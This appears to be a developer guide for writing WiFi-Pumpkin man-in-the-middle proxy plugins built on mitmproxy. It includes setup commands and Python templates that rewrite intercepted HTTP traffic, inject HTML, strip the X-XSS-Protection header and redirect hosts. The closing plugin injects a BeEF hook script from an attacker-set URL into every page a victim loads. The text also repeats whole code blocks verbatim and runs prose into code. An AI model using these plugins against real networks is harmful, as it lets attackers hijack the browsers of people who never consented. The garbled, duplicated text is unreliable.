my implements transparent proxies (mitmproxy) can use to intercept and manipulate HTTP traffic modifying requests and responses.
$ sudo apt-get update
$ sudo apt-get install -y python-pip libffi-dev
$ libssl-dev libxml2-dev libxslt1-dev zlib1g-dev
$ sudo apt-get install -y python-qt4
$ sudo apt-get install -y python-dev git
$ sudo apt-get install -y libpcap-dev
$ sudo pip install -r requirements.txt
$ sudo pip install mitmproxy==0.18.2Transparent proxies(mitmproxy) that you can use to intercept and manipulate HTTP traffic modifying requests and responses, that allow to inject javascripts into the targets visited. You can easily implement a module to inject data into pages creating a python file in directory "plugins/" automatically will be loaded.
from mitmproxy.models import decoded # for decode content html
from plugins.extension.plugin import PluginTemplate
class Nameplugin(PluginTemplate):
meta = {
'Name' : 'Nameplugin',
'Version' : '1.0',
'Description' : 'Brief description of the new plugin',
'Author' : 'by dev'
}
def __init__(self):
for key,value in self.meta.items():
self.__dict__[key] = value
# if you want set arguments check refer wiki more info.
self.ConfigParser = False # No require arguments
def request(self, flow):
print flow.__dict__
print flow.request.__dict__
print flow.request.headers.__dict__ # request headers
host = flow.request.pretty_host # get domain on the fly requests
versionH = flow.request.http_version # get http version
# get redirect domains example
# pretty_host takes the "Host" header of the request into account,
if flow.request.pretty_host == "example.org":
flow.request.host = "mitmproxy.org"
# get all request Header example
self.send_output.emit("\n[{}][HTTP REQUEST HEADERS]".format(self.Name))
for name, valur in flow.request.headers.iteritems():
self.send_output.emit('{}: {}'.format(name,valur))
print flow.request.method # show method request
# the model printer data
self.send_output.emit('[NamePlugin]:: this is model for save data logging')
def response(self, flow):
print flow.__dict__
print flow.response.__dict__
print flow.response.headers.__dict__ #convert headers for python dict
print flow.response.headers['Content-Type'] # get content type
#every HTTP response before it is returned to the client
with decoded(flow.response):
print flow.response.content # content html
flow.response.content.replace('</body>','<h1>injected</h1></body>') # replace content tag
del flow.response.headers["X-XSS-Protection"] # remove protection Header
flow.response.headers["newheader"] = "foo" # adds a new header
#and the new header will be added to all responses passing through the proxyFirst of all write the import plugin tamplate
from plugins.extension.plugin import PluginTemplatethe basic plugin example:
from plugins.extension.plugin import PluginTemplate
class Example(PluginTemplate):
meta = {
'Name' : 'exampleplugin',
'Version' : '1.0',
'Description' : 'description of plugin',
'Author' : 'by dev Name',
}
def __init__(self):
for key,value in self.meta.items():
self.__dict__[key] = value
self.ConfigParser = False # requeire args
def request(self, flow): # get all request HTTP traffic
pass
def response(self, flow): # get all response HTTP traffic
passSimple fuctions that just adds a header to every request..
def response(self, flow):
flow.response.headers["newheader"] = "foo" # adds a new headerexample from mitmproxy how to redirect connections (IP spoofing)
def request(self, flow):
if flow.client_conn.ssl_established:
flow.request.scheme = "https"
sni = flow.client_conn.connection.get_servername()
port = 443
else:
flow.request.scheme = "http"
sni = None
port = 80
host_header = flow.request.pretty_host
m = parse_host_header.match(host_header)
if m:
host_header = m.group("host").strip("[]")
if m.group("port"):
port = int(m.group("port"))
flow.request.host = sni or host_header
flow.request.port = portanother example how to rewrite packet in real time
from mitmproxy.models import decoded # for decode content html
from plugins.extension.plugin import PluginTemplate
class Nameplugin(PluginTemplate):
meta = {
'Name' : 'Nameplugin',
'Version' : '1.0',
'Description' : 'Brief description of the new plugin',
'Author' : 'by dev'
}
def __init__(self):
for key,value in self.meta.items():
self.__dict__[key] = value
# if you want set arguments check refer wiki more info.
self.ConfigParser = False # No require arguments
def request(self, flow):
print flow.__dict__
print flow.request.__dict__
print flow.request.headers.__dict__ # request headers
host = flow.request.pretty_host # get domain on the fly requests
versionH = flow.request.http_version # get http version
# get redirect domains example
# pretty_host takes the "Host" header of the request into account,
if flow.request.pretty_host == "example.org":
flow.request.host = "mitmproxy.org"
# get all request Header example
self.send_output.emit("\n[{}][HTTP REQUEST HEADERS]".format(self.Name))
for name, valur in flow.request.headers.iteritems():
self.send_output.emit('{}: {}'.format(name,valur))
print flow.request.method # show method request
# the model printer data
self.send_output.emit('[NamePlugin]:: this is model for save data logging')
def response(self, flow):
print flow.__dict__
print flow.response.__dict__
print flow.response.headers.__dict__ #convert headers for python dict
print flow.response.headers['Content-Type'] # get content type
#every HTTP response before it is returned to the client
with decoded(flow.response):
print flow.response.content # content html
flow.response.content.replace('</body>','<h1>injected</h1></body>') # replace content tag
del flow.response.headers["X-XSS-Protection"] # remove protection Header
flow.response.headers["newheader"] = "foo" # adds a new header
#and the new header will be added to all responses passing through the proxyif you want to save data(pumpkin-prxoy.log) in your plugin, just use self.send_output.emit('msg here')
def request(self, flow):
self.send_output.emit('[example]:: this is hellow WiFi-Pumpkin')Now, if you want to add argumments in proxy.ini, you need to add in directory "core/pumpkinProxy.ini" the key (exampleplugin and set_exampleplugin).
- exampleplugin key is the option checkbox to change and enable or disable plugin
- set_exampleplugin this is key for search all argumments in Settings option.
class beef(PluginTemplate):
meta = {
'Name' : 'beef',
'Version' : '1.0',
'Description' : 'this module proxy inject hook beef api url.[Hook URL]',
'Author' : 'Marcos Nesster'
}
def __init__(self):
for key,value in self.meta.items():
self.__dict__[key] = value
self.ConfigParser = True
self.urlhook = self.config.get_setting('set_beef','hook')
def request(self, flow):
pass
def response(self,flow):
with decoded(flow.response): # Remove content encoding (gzip, ...)
html = BeautifulSoup(flow.response.content)
"""
# To Allow CORS
if "Content-Security-Policy" in flow.response.headers:
del flow.response.headers["Content-Security-Policy"]
"""
if html.body:
script = html.new_tag(
'script',
src=self.urlhook)
html.body.insert(0, script)
flow.response.content = str(html)
self.send_output.emit("[{}] Injected BeFF url hook...".format(self.Name))